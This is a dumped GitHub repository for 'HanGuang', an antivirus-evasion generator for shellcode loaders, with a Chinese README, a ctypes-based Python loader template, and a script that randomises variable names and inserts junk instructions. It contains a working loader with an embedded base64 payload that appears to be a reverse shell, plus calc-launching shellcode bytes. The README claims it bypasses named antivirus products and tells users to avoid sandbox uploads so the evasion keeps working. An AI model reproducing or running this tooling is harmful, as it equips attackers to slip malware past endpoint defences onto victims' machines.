├── .idea
├── .gitignore
├── HanGuang.iml
├── dictionaries
├── encodings.xml
├── inspectionProfiles
│ ├── Project_Default.xml
│ └── profiles_settings.xml
├── misc.xml
├── modules.xml
└── vcs.xml
├── README.md
├── calc.py
├── calc.raw
├── dist
├── calc.exe
└── shellcode.exe
├── hanguang.py
├── img
├── HanGuang1.png
├── HanGuang10.png
├── HanGuang11.png
├── HanGuang2.png
├── HanGuang3.png
├── HanGuang4.png
├── HanGuang5.png
├── HanGuang8.png
└── HanGuang9.png
├── modle
├── __pycache__
│ ├── auto_random.cpython-37.pyc
│ └── autor.cpython-37.pyc
├── auto_random.py
└── autor.py
├── shellcode.py
└── source.py
/.idea/.gitignore:
--------------------------------------------------------------------------------
1 | # Default ignored files
2 | /shelf/
3 | /workspace.xml
4 | # Datasource local storage ignored files
5 | /../../../../../:\onedrive\桌面\HanGuang\.idea/dataSources/
6 | /dataSources.local.xml
7 | # 基于编辑器的 HTTP 客户端请求
8 | /httpRequests/
9 |
--------------------------------------------------------------------------------
/.idea/HanGuang.iml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
--------------------------------------------------------------------------------
/.idea/dictionaries:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/.idea/encodings.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/.idea/inspectionProfiles/Project_Default.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
46 |
47 |
48 |
--------------------------------------------------------------------------------
/.idea/inspectionProfiles/profiles_settings.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/.idea/misc.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/.idea/modules.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/.idea/vcs.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | ## 含光---免杀生成器(含光的加载器编写思路)
2 |
3 |
4 |
5 | ### 最简单的加载器免杀思路
6 |
7 | 1. 将加载器的变量每次生成都要随机也就是变量混淆,
8 | 2. 同时在每行之间插入无效指令:比如随机打印,循环打印,随机数计算加减乘除
9 |
10 | 这个思路的主要作用是加载器伪装。不管shellcode如果变化加密解密,最后都要回到这个模板里面加载。就算是采用分离免杀的方法,shellcode本身不会被杀,但是这个加载器会被杀,所以经过这样伪装之后加载器可以存活,为后面各种花里胡哨的的免杀奠定基础。
11 |
12 |
13 | source.py是模板
14 |
15 | shellcode.py是本程序生成的加载器,可以使用pyinstaller直接构建成exe
16 |
17 | ### 实践过程
18 |
19 | 1. 这是从网上找来的python加载shellcode的代码,只要搜索谁都能找得到。把它作为模板进行伪装。
20 |
21 | ```python
22 | import ctypes,base64,time
23 |
24 |
25 | buf = ""
26 |
27 | shellcode = bytearray(buf)
28 | # 设置VirtualAlloc返回类型为ctypes.c_uint64
29 | ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
30 | # 申请内存
31 | ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
32 |
33 | # 放入shellcode
34 | buffered = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
35 | ctypes.windll.kernel32.RtlMoveMemory(
36 | ctypes.c_uint64(ptr),
37 | buffered,
38 | ctypes.c_int(len(shellcode))
39 | )
40 | # 创建一个线程从shellcode防止位置首地址开始执行
41 | handle = ctypes.windll.kernel32.CreateThread(
42 | ctypes.c_int(0),
43 | ctypes.c_int(0),
44 | ctypes.c_uint64(ptr),
45 | ctypes.c_int(0),
46 | ctypes.c_int(0),
47 | ctypes.pointer(ctypes.c_int(0))
48 | )
49 | # 等待上面创建的线程运行完
50 | ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))
51 | ```
52 |
53 | 2. 先进行一个base的编码,方便将shellcode替换,因为要读raw原格式的payload,是二进制存储的。
54 |
55 | 
56 |
57 | 3. 编写一个用来生成随机的类
58 |
59 | 
60 |
61 | 4. 编写随机变量生成函数
62 |
63 | 模板中随机变量只有三个,分别是shellcode、ptr、buffered。只需要将这三个变量替换为随机字符串即可。
64 |
65 | 随机字符串这里设置为最小长度为5,最大长度为10,第一个字符不能为数字(因为这不符合python语法)。
66 |
67 | 
68 |
69 | 5. 编写随机空白指令函数
70 |
71 | 先在模板的每一行中间插入command1-7作为占位符,用来替换。同时添加flag_to_replace占位符用来替换shellcode。所以模板就变成了下面这样。
72 |
73 | ```python
74 | import ctypes,base64,time
75 |
76 | command1
77 |
78 | shellcode = base64.b64decode('flag_to_replace')
79 |
80 | command2
81 |
82 | shellcode = bytearray(shellcode)
83 |
84 | command3
85 |
86 | ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
87 |
88 | command4
89 |
90 | ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
91 |
92 | command5
93 |
94 | buffered = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
95 |
96 | command5
97 |
98 | ctypes.windll.kernel32.RtlMoveMemory(
99 | ctypes.c_uint64(ptr),
100 | buffered,
101 | ctypes.c_int(len(shellcode))
102 | )
103 |
104 | command7
105 |
106 | handle = ctypes.windll.kernel32.CreateThread(
107 | ctypes.c_int(0),
108 | ctypes.c_int(0),
109 | ctypes.c_uint64(ptr),
110 | ctypes.c_int(0),
111 | ctypes.c_int(0),
112 | ctypes.pointer(ctypes.c_int(0))
113 | )
114 | ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))
115 | ```
116 |
117 | 函数处理也很简单,只需要替换掉占位符即可
118 |
119 | 
120 |
121 | 生成空白指令函数也很简单,就是一个列表里面存了一些空白指令,然后从列表里面随机返回一个指令。当然空白指令也是随机生成的。
122 |
123 | 
124 |
125 | 最终生成一个新的py文件,效果如下
126 |
127 | ```python
128 | import ctypes,base64,time
129 |
130 | neccpbehr7bzncnpqywr3v2ol1svhdf5sorlkam74un12v9e7oe0rwvsqgqdc41m2n98vla7evs74507267fjx3qp7dlhbubbvvn7k79xee2hop9y9qubj2ewhp3sb48hs1jutjttoqj8cv7m8tt4kcodmylsapgme8rbpvkkoq4mql82ez5tyehhygnk3s0hzpg4zlhzs8x7ju84e6x6acmnzrewpp6stb2q2g388ixfemy07cvr81szqg274k9clkug8t3vkbpkp7i5v2ztqug4lv7a65f2fubnxxj82o33tmvalu5zbyt5mda6p8zes6bstmwht23avbaci92ncppggtnbe37d648db3vbwipr38t8newrrrdhm2wngi27op1ix2eavi5mzlrhu7uvpscxsq0ggqfecihb9lxwg3p8h8lz1zbwkw7os41z3xgjj6kx54hf0vzqgwht1spbrb2wkt7nt1lu5p7eanl9r2fa3lzfujm6af809ywyh1doisakex5ijqo3h7v3qccayykmpbf4zztzpf821b350p5kk67364pltin0hrubn4ooglzkehc65xvoi94yp951mtm4candx8n4nu78q81sutt4v00h1mbasdw2ypqy8o9g3 = 42048826 - 7411178
131 |
132 | s50zd4mc = base64.b64decode('/EiD5PDozAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSA+3SkpNMclIi3JQSDHArDxhfAIsIEHByQ1BAcHi7VJIi1IgQVGLQjxIAdBmgXgYCwIPhXIAAACLgIgAAABIhcB0Z0gB0ESLQCCLSBhQSQHQ41ZNMclI/8lBizSISAHWSDHAQcHJDaxBAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEFYQVheSAHQWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpS////11JvndzMl8zMgAAQVZJieZIgeygAQAASYnlSbwCABFcwKi1hUFUSYnkTInxQbpMdyYH/9VMiepoAQEAAFlBuimAawD/1WoKQV5QUE0xyU0xwEj/wEiJwkj/wEiJwUG66g/f4P/VSInHahBBWEyJ4kiJ+UG6maV0Yf/VhcB0Ckn/znXl6JMAAABIg+wQSIniTTHJagRBWEiJ+UG6AtnIX//Vg/gAflVIg8QgXon2akBBWWgAEAAAQVhIifJIMclBulikU+X/1UiJw0mJx00xyUmJ8EiJ2kiJ+UG6AtnIX//Vg/gAfShYQVdZaABAAABBWGoAWkG6Cy8PMP/VV1lBunVuTWH/1Un/zuk8////SAHDSCnGSIX2dbRB/+dYagBZScfC8LWiVv/V')
133 |
134 | time.sleep(3)
135 |
136 | s50zd4mc = bytearray(s50zd4mc)
137 |
138 | bc53udd6mwe8ucehku7ac9jq82chpmeylog1dfnvjf63ipd4tj1y0fl8youygux5gdi3wygp0qiyoqbxx0een59un7pq8o7xwneqoi0arnopsjb3pvzkll7bji5z1ebobtrtm9dlpv63utnucm27sn96cs3zvkbzsxm1zzomp2db5zmlpmq3i2q6plpgm0l3tjtotdj7os6v9kb500mis0fpfn0yhh3myzzij8r7gdnyvoedhcnxpjxoogs95wkucczqmy9xr8qw5zfhzuaj87kxhmpt9wdx9s2q5wylfsvl8wr8mtl2vl6bc65dg4qqmfgrk2mn1tawb53bumgcrtcf7r1db6nyr1c3d592n6joftfbretjm1f2r7bnj3mu6trnjynvsp8juw3jxqk9jk8g87efy1jo231winmxscb2u2qhv0m3q5l1nizghyqpv7ilata7r26pqmlob3tt9rcyljcw5snjrt7b0tst08i5jostyyk0pxiidivo0uy68npugwl627c3ezht26miz4ltszk = "xaalc3nhqnszkylpx7t4gjukbs1re6dio2puzh3lwr8575ozew4hesx9aiyc1z1m9as5ghx4jc9f8i1lqhiqcgaddu1czescvrsf2dfsx5z7d09x1hh8fnv0914dyhp7gfh30ischxrqwfcfkcbqqhekki7m45hnfty2cbjd15mgq2dkrruunj78w6ao2xtbo3jhvfttc7ll46s1hezozx074j2oul4g8dfv1my9spaacrc2n8ase3x0pylcc5q4gtfoli9abakoz61fedfyjpis56w7bdhedvzwvgmma5b8vhk1tt8vfhcvz4mmdal7aaft7x76fnfto7a8nbbz593ua7b04m2vqbfwa6f2gwbxywo8suivisqln96ozl6k1x9oianju5awtzuk61iycoc75xwnm17xha7pp1pdm4m3aomvobtrcotd170xccplkrlypz6biuukkas970v5o9cxmveqdj87q3pkha1tyg3fysemkalme1wl9fhdohqvc6hrvlov4bty307c5dhdjupmbchch6zgkotlcmqg8uk4dv464c0er06x24eafdjr92i5a3a1b0suq9ujqcd0z8ef6dkqua54zyi9jpcdomza9g02v4k4r0nyixhjprfd95imprtiixcrdy79waunq4h25f4hn075rzy0alk1rnj3j0oqtuieqj5qg8ccz0mtc3gpswpyckryfydvt0nw8t6iapicbfu08rjqkce4rx8s0cybjiwowkfwbfjad49u06nm7p0md363b34vvvvejppx0utl3e47uez7l88mn2jvr5jx50clcw5ayy6afo0qpv36e9up5dbyk" + "dc8rclrz41gvmed5lhandwj87lifvvdwtk800lfrm4bf33og8a9o77y4x6ingugcimo7kldrmu0b01emm85jxs842gcdg6tmjcf56fysymyl1drlnunos5eja55b82yz9424vdt4stt7g2x81nqg7ch4gx0a5pxrr8frcbxk0zm7539a7ytu1v7ie2u2hx5yv6ev0pb5gsn8n0siykme0tlwqxfw7vrwm99gu216ciutwr5gu19cn1j9n6kujjyv5bbo2tbpded0ssij57cq4fcgmkjw91it3pyhjpbwhy2a4npxyz3j7l1pqppi1ykfm4kgrrwysptv0zzsjks47q989aegsdk27uqh5uj6hvpryz1cvpzodk38jwrqpf7cz4973w6fdptyoovwxfpqubdsk32fq3bcoxyr3a9nqckt7u90t48dxugkpnurnbr1iygu9qi77jqqi7d3k19ljdbogzqfxlsu8zbr8qkond492fwl71w74covapxl7aaxp6m4jx9204ym03rfyf9ewscugi2hom1vp5hnosifguw4v886zv2qji30vvtl1yjrago4tmmae0knkfyaakkh27l3a9fru7o93vtwfd48r4ffw73k8lp5k8g8q2tz052kndfpsdvkg93h9gsna85qt198h3niir72lo4dvh9lixtonvrpfo7skbosg2ps8wa1ja1uwul5s7uxrzj79soyo4aajok52sw3pvgj1ljmai40"
139 |
140 | ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
141 |
142 | nds43ymxsskkaa25dkbcqysbkg8c3yzr6qdgnsb8vizunrexgmoz405d2x1enahbf0qvg9quiwpec39cgnmykcqi2aih52xu85n72b84gtsgu5z04qj6r5dgawxlsp1hbjpcetqtf4lxuj0k3a5y6dvhsb85dsso51ar4b9oqir40cbjqy5fvlqzx7cp86y1jvpuklbgbubj1nijs02gzt3ih7jg8ltzxfll2ul4pnsge6g9sypcmhv2anj4ipy74dhb8qglk8zgc0ez6sc6zbodrbeseleka2ze51dtm7dqtri1nn674x0e1j5jd5b8w9rjdub3f9dt22bshqw8vfmuz4zvfyjs2wv4fo1ne96cqvgiikv0j9aq66pth3qn0pieh2m43hmbjglzzj4exjjgi8g2893161b90asvuy0rm6ai4ho0ir3z9aibjydhdxrktq4fxat1n2qv12oj7zht6wafbg8430fk6wi9yzfhqn89waypsa4sj254bli99r8ddbkh4hfa5o5wsfw7oqargmpkvs68cna45ac20yorov9lve6dvxg4gwklfabj15zwsoi6k9iuy460hholsqcd3759klqjrw6s178ythm4wfi5ujrf2q6lzko1ikoc2698tribju621y2qbnk3i3jvecxlncbrvwc203mrdlytwxjmpvflw89mqu41opniz338y57h0x31 = 79966329 / 39623958
143 |
144 | ui41vo0urj = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(s50zd4mc)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
145 |
146 | ehvapdqxisaekt9fjnt1xyw03pqvrl08q4crdtpmkfj7heaabsjuvzjc8oqzok6jhlo9ymh31za3tueanzbqpj6m8hxxa2ux1ta4b3udhpdurdnk4ampyldamcpi8sj95rlz0xeecytbwbq46t473t9dpq8d8ocznfstrk9d9x5ncw8ntj0vd2miq79yusghldkn7cnunr5zzwz4m87lw6g4vn2lcf61skxmeuzadas71tc5tdl0w01uy43vyyb5nsaexj9udjaxxro3b0ge1rjbn8l9fm743pjoug17yi2w465c8txylb9iteoe6on3tzxq80jb5c9st100x5obxkdsv5hfjmv1ek89jjxkfyzgepup7vuu0ei51eo0p2win78t57w793471wuyzzir6e6t4p4tg3dot664jgy0tpaa9g4djhd8y7v6ts76mjlks4a0prkanh9gq5lmjefuat3a66cvyww38vq2o0qf77kp2nsa4s7syf66jtrd4jeqva10ds6w4ihz8sc6a8vaio55911sy3d9dp0bfeio4uxppk5nf2vq29asvytl6hcfroxjl6hpzsujlw6jvvhdm1ghmkjiqfmy6ouv6xa709xs9p5jj13t0iijy7okxcqrkmkpyemls1wwvdi0hj11nf1sj546v337zjyozepce3ob6jyexi53wrq2gnyvy5a025 = 338387 + 51678963
147 |
148 | xqnsl = (ctypes.c_char * len(s50zd4mc)).from_buffer(s50zd4mc)
149 |
150 | ehvapdqxisaekt9fjnt1xyw03pqvrl08q4crdtpmkfj7heaabsjuvzjc8oqzok6jhlo9ymh31za3tueanzbqpj6m8hxxa2ux1ta4b3udhpdurdnk4ampyldamcpi8sj95rlz0xeecytbwbq46t473t9dpq8d8ocznfstrk9d9x5ncw8ntj0vd2miq79yusghldkn7cnunr5zzwz4m87lw6g4vn2lcf61skxmeuzadas71tc5tdl0w01uy43vyyb5nsaexj9udjaxxro3b0ge1rjbn8l9fm743pjoug17yi2w465c8txylb9iteoe6on3tzxq80jb5c9st100x5obxkdsv5hfjmv1ek89jjxkfyzgepup7vuu0ei51eo0p2win78t57w793471wuyzzir6e6t4p4tg3dot664jgy0tpaa9g4djhd8y7v6ts76mjlks4a0prkanh9gq5lmjefuat3a66cvyww38vq2o0qf77kp2nsa4s7syf66jtrd4jeqva10ds6w4ihz8sc6a8vaio55911sy3d9dp0bfeio4uxppk5nf2vq29asvytl6hcfroxjl6hpzsujlw6jvvhdm1ghmkjiqfmy6ouv6xa709xs9p5jj13t0iijy7okxcqrkmkpyemls1wwvdi0hj11nf1sj546v337zjyozepce3ob6jyexi53wrq2gnyvy5a025 = 338387 + 51678963
151 |
152 | ctypes.windll.kernel32.RtlMoveMemory(
153 | ctypes.c_uint64(ui41vo0urj),
154 | xqnsl,
155 | ctypes.c_int(len(s50zd4mc))
156 | )
157 |
158 | print("y5v8cap00i4ofd2qmwbsqrkx55oo85b36mdmdfnin9dada8eigu9mwwgsiilccyz0mqs5093c02oxd6gez7rdf9mrlh7597epbiurh1th1tzp7nmtba548veex163593kg4jx45hyuhnrcz9aanpirlowbvmua5f3yrs9kthg5d94b25y2gwiiy9owp7lxz1y0a8o0utcxgvkfv2relwf9hhn7int1jibwfmp83pfyz0mf5g8dl975ic5b3xt4f72rs7f4zl4rcx6vgi1pyhiztz9kxyy8ah8gdggtjyj9luxpyoj0638p80l2rmmbp3hof5jh1po9hnii2hggkch8k6natj0kz1r37l0oytpkl7ac3bi6n98qelitt18kvosh6kqbt1xec676k3s6d72nhzt1pa86fkp91xvicuh2mv3vpkvt9jxmaf3ktf201zrjs296wwu6881nk07vxipprspsthbzlu4jsiwca1gvwu1b7pun1satn4lfvh61j0o8dq6dzxaqgjnaz4h9v8etwvaqkwy62hfrjgenrtup2iktedcxs59fk88zwsm5as5wa8w1hodhc3qgaopo7udkta9j1prdoacsduqf9ce4nsjka1a4baf320ydmifcaufd94zemh58e6cbgc45cxdh86tosw4ib4nzi0m81vqbex9nd2rrgdtusu7ussok7ab7flph4ld3wthwjc12bvdfzfuye3kauqbq9u1")
159 |
160 | handle = ctypes.windll.kernel32.CreateThread(
161 | ctypes.c_int(0),
162 | ctypes.c_int(0),
163 | ctypes.c_uint64(ui41vo0urj),
164 | ctypes.c_int(0),
165 | ctypes.c_int(0),
166 | ctypes.pointer(ctypes.c_int(0))
167 | )
168 | ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))
169 |
170 | ```
171 |
172 | 最后使用pyinstaller打包成exe
173 |
174 | ```
175 | pyinstaller -F shellcode.py
176 | ```
177 |
178 |
179 |
180 | ### 效果展示(2021年3月24日)
181 |
182 | #### 火绒
183 |
184 | 
185 |
186 | #### 360
187 |
188 | 
189 |
190 | 
191 |
192 | 
193 |
194 |
195 |
196 |
197 |
198 | TODO:使用其他语言重构(c语言,go语言等),尽量减小体积和特征。
199 |
200 |
201 |
202 | ## 内部免杀工具含光加载器部分使用的是这个思路,由于某些原因不便开放源代码。
203 |
204 | 打包发布一个精简版本,可以去 [release]( https://github.com/MrWQ/HanGuang/releases) 下载使用,低调使用。
205 |
206 | 为了持久免杀,不要上传沙箱。
207 |
208 | 为了持久免杀,不要上传沙箱。
209 |
210 | 为了持久免杀,不要上传沙箱。
211 |
212 | 免责声明:仅供学习交流切勿用于非法用途。
213 |
--------------------------------------------------------------------------------
/calc.py:
--------------------------------------------------------------------------------
1 | buf = b""
2 | buf += b"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41"
3 | buf += b"\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48"
4 | buf += b"\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f"
5 | buf += b"\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c"
6 | buf += b"\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52"
7 | buf += b"\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x8b"
8 | buf += b"\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0"
9 | buf += b"\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56"
10 | buf += b"\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9"
11 | buf += b"\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0"
12 | buf += b"\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58"
13 | buf += b"\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44"
14 | buf += b"\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0"
15 | buf += b"\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
16 | buf += b"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
17 | buf += b"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00"
18 | buf += b"\x00\x00\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41"
19 | buf += b"\xba\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41"
20 | buf += b"\xba\xa6\x95\xbd\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06"
21 | buf += b"\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a"
22 | buf += b"\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c\x63\x00"
23 |
--------------------------------------------------------------------------------
/calc.raw:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MrWQ/HanGuang/8c0886a7c79cb9d242df5c312d5d874acd0f3c14/calc.raw
--------------------------------------------------------------------------------
/dist/calc.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MrWQ/HanGuang/8c0886a7c79cb9d242df5c312d5d874acd0f3c14/dist/calc.exe
--------------------------------------------------------------------------------
/dist/shellcode.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MrWQ/HanGuang/8c0886a7c79cb9d242df5c312d5d874acd0f3c14/dist/shellcode.exe
--------------------------------------------------------------------------------
/hanguang.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 | # -*- encoding: utf-8 -*-
3 | # @Time : 2021/3/23 13:46
4 | # @Author : ordar
5 | # @File : hanguang.py
6 | # @Project : HanGuang
7 | # @Python : 3.7.5
8 | import base64
9 | import os
10 | import re
11 |
12 | from modle.autor import AUTOR
13 | import sys
14 |
15 | auto = AUTOR()
16 |
17 | make_shellcode = """
18 | import ctypes,base64,time
19 |
20 | command1
21 |
22 | shellcode = base64.b64decode('flag_to_replace')
23 |
24 | command2
25 |
26 | shellcode = bytearray(shellcode)
27 |
28 | command3
29 |
30 | ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
31 |
32 | command4
33 |
34 | ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40))
35 |
36 | command5
37 |
38 | buffered = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
39 |
40 | command5
41 |
42 | ctypes.windll.kernel32.RtlMoveMemory(
43 | ctypes.c_uint64(ptr),
44 | buffered,
45 | ctypes.c_int(len(shellcode))
46 | )
47 |
48 | command7
49 |
50 | handle = ctypes.windll.kernel32.CreateThread(
51 | ctypes.c_int(0),
52 | ctypes.c_int(0),
53 | ctypes.c_uint64(ptr),
54 | ctypes.c_int(0),
55 | ctypes.c_int(0),
56 | ctypes.pointer(ctypes.c_int(0))
57 | )
58 | ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))
59 | """
60 |
61 |
62 | # 使变量随机
63 | def make_variable_random(shellcode):
64 | shellcode = shellcode.replace("shellcode", auto.random.auto_random_word(min_length=5, max_length=10, first_str_no_num=True))
65 | shellcode = shellcode.replace("ptr", auto.random.auto_random_word(min_length=5, max_length=10, first_str_no_num=True))
66 | shellcode = shellcode.replace("buffered", auto.random.auto_random_word(min_length=5, max_length=10, first_str_no_num=True))
67 | return shellcode
68 |
69 | # 使指令随机-花指令
70 | def make_command_random(shellcode):
71 | shellcode = shellcode.replace("command1", auto.random.auto_random_void_command())
72 | shellcode = shellcode.replace("command2", auto.random.auto_random_void_command())
73 | shellcode = shellcode.replace("command3", auto.random.auto_random_void_command())
74 | shellcode = shellcode.replace("command4", auto.random.auto_random_void_command())
75 | shellcode = shellcode.replace("command5", auto.random.auto_random_void_command())
76 | shellcode = shellcode.replace("command6", auto.random.auto_random_void_command())
77 | shellcode = shellcode.replace("command7", auto.random.auto_random_void_command())
78 | return shellcode
79 |
80 | def get_file_content(file_path):
81 | try:
82 | with open(file_path, 'rb') as f:
83 | return f.read()
84 | except:
85 | pass
86 |
87 |
88 | if __name__ == '__main__':
89 | file_path = sys.argv[1]
90 | file_type = os.path.splitext(file_path)[1]
91 | if file_type == '.raw' or file_type == '.bin':
92 | raw = get_file_content(file_path)
93 | raw_bs64 = base64.b64encode(raw)
94 | code = raw_bs64.decode()
95 | print(code)
96 | b = base64.b64decode(code)
97 | print(b)
98 | else:
99 | with open(file_path, 'r') as txt:
100 | file_content = txt.read()
101 | if not file_content:
102 | exit(-1)
103 | all_code = re.findall(r'\\{1}x(\w{2})', file_content)
104 | shellcode = b''
105 | for i in all_code:
106 | shellcode = shellcode + bytes.fromhex(i)
107 | bs64_code = base64.b64encode(shellcode)
108 | code = bs64_code.decode()
109 | print(code)
110 | b = base64.b64decode(code)
111 | print(b)
112 |
113 | make_shellcode = make_shellcode.replace('flag_to_replace', code)
114 | make_shellcode = make_variable_random(make_shellcode)
115 | make_shellcode = make_command_random(make_shellcode)
116 | with open('shellcode.py', 'w') as shellfile:
117 | shellfile.write(make_shellcode)
118 |
119 |
--------------------------------------------------------------------------------
/img/HanGuang1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MrWQ/HanGuang/8c0886a7c79cb9d242df5c312d5d874acd0f3c14/img/HanGuang1.png
--------------------------------------------------------------------------------
/img/HanGuang10.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MrWQ/HanGuang/8c0886a7c79cb9d242df5c312d5d874acd0f3c14/img/HanGuang10.png
--------------------------------------------------------------------------------
/img/HanGuang11.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MrWQ/HanGuang/8c0886a7c79cb9d242df5c312d5d874acd0f3c14/img/HanGuang11.png
--------------------------------------------------------------------------------
/img/HanGuang2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MrWQ/HanGuang/8c0886a7c79cb9d242df5c312d5d874acd0f3c14/img/HanGuang2.png
--------------------------------------------------------------------------------
/img/HanGuang3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MrWQ/HanGuang/8c0886a7c79cb9d242df5c312d5d874acd0f3c14/img/HanGuang3.png
--------------------------------------------------------------------------------
/img/HanGuang4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MrWQ/HanGuang/8c0886a7c79cb9d242df5c312d5d874acd0f3c14/img/HanGuang4.png
--------------------------------------------------------------------------------
/img/HanGuang5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MrWQ/HanGuang/8c0886a7c79cb9d242df5c312d5d874acd0f3c14/img/HanGuang5.png
--------------------------------------------------------------------------------
/img/HanGuang8.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MrWQ/HanGuang/8c0886a7c79cb9d242df5c312d5d874acd0f3c14/img/HanGuang8.png
--------------------------------------------------------------------------------
/img/HanGuang9.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MrWQ/HanGuang/8c0886a7c79cb9d242df5c312d5d874acd0f3c14/img/HanGuang9.png
--------------------------------------------------------------------------------
/modle/__pycache__/auto_random.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MrWQ/HanGuang/8c0886a7c79cb9d242df5c312d5d874acd0f3c14/modle/__pycache__/auto_random.cpython-37.pyc
--------------------------------------------------------------------------------
/modle/__pycache__/autor.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/MrWQ/HanGuang/8c0886a7c79cb9d242df5c312d5d874acd0f3c14/modle/__pycache__/autor.cpython-37.pyc
--------------------------------------------------------------------------------
/modle/auto_random.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 | # -*- encoding: utf-8 -*-
3 | # @Time : 2021/3/5 15:53
4 | # @Author : ordar
5 | # @File : auto_random.py
6 | # @Project : autoer
7 | # @Python : 3.7.5
8 | import time
9 | import random
10 |
11 |
12 | class AUTO_RANDOM:
13 | def auto_random_int(self, max_int, min_int=0):
14 | """
15 | 生成一个随机整数
16 | :param min_int:最小数(包含)
17 | :param max_int:最大数(包含)
18 | :return:
19 | """
20 | return random.randint(min_int, max_int)
21 |
22 | def auto_random_str(self, has_num=True):
23 | """
24 | 随机生成一个字符
25 | :param has_num: 是否可以有数字做字符
26 | :return: 字符
27 | """
28 | strs = [
29 | 'a',
30 | 'b',
31 | 'c',
32 | 'd',
33 | 'e',
34 | 'f',
35 | 'g',
36 | 'h',
37 | 'i',
38 | 'j',
39 | 'k',
40 | 'l',
41 | 'm',
42 | 'n',
43 | 'o',
44 | 'p',
45 | 'q',
46 | 'r',
47 | 's',
48 | 't',
49 | 'u',
50 | 'v',
51 | 'w',
52 | 'x',
53 | 'y',
54 | 'z',
55 | '0',
56 | '1',
57 | '2',
58 | '3',
59 | '4',
60 | '5',
61 | '6',
62 | '7',
63 | '8',
64 | '9']
65 | strs_no_num = [
66 | 'a',
67 | 'b',
68 | 'c',
69 | 'd',
70 | 'e',
71 | 'f',
72 | 'g',
73 | 'h',
74 | 'i',
75 | 'j',
76 | 'k',
